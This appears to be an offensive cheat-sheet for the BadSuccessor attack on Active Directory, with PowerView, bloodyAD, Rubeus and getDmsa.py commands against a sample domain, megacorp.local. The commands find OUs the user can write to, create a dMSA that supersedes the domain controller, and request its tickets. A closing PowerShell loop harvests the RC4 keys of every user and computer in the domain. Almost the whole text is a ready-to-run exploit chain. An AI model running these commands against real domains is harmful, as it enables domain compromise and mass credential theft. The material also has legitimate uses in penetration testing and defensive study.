Copy PV > Get-DomainObjectAcl -LDAPFilter "(objectClass=organizationalUnit)" -Where "ActiveDirectoryRights contains CreateChild"
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] get writable --otype OU [--right CHILD]
Copy PV > Add-DomainDMSA -Identity mydmsa -PrincipalsAllowedToRetrieveManagedPassword jdoe -SupersededAccount DC01 [-BaseDN "CN=Managed Service Accounts,DC=megacorp,DC=local"]
$ bloodyAD -d megacorp.local -k --host DC01.megacorp.local --dc-ip 192.168.1.11 --dns 192.168.1.11 [--gc 192.168.1.11] [-s] add badSuccessor mydmsa -t "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local" [--ou "CN=Managed Service Accounts,DC=megacorp,DC=local"]
Copy Cmd > Rubeus.exe asktgs /targetuser:mydmsa$ /service:krbtgt/megacorp.local /dmsa /opsec /nowrap /ticket:<JDOE_TGT>
$ python3 minikerberos/examples/getDmsa.py 'kerberos+ccache://megacorp.local\jdoe:tgt.ccache@192.168.1.11' 'mydmsa$@megacorp.local' --ccache /tmp/mydmsa.ccache
Copy $domain = Get-ADDomain
$dmsa = "CN=mydmsa,CN=Managed Service Accounts,$($domain.DistinguishedName)"
$allDNs = @(Get-ADUser -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName) `
+ @(Get-ADComputer -Filter * | select @{n='DN';e={$_.DistinguishedName}}, sAMAccountName)
$allDNs | % {
Set-ADObject -Identity $dmsa -Replace @{ "msDS-ManagedAccountPrecededByLink" = $_.DN }
$res = Invoke-Rubeus asktgs /targetuser:mydmsa$ /service:"krbtgt/$($domain.DNSRoot)" /opsec /dmsa /nowrap /ticket:$kirbi
$rc4 = [regex]::Match($res, 'Previous Keys for .*\$: \(rc4_hmac\) ([A-F0-9]{32})').Groups[1].Value
"$($_.sAMAccountName):$rc4"
} 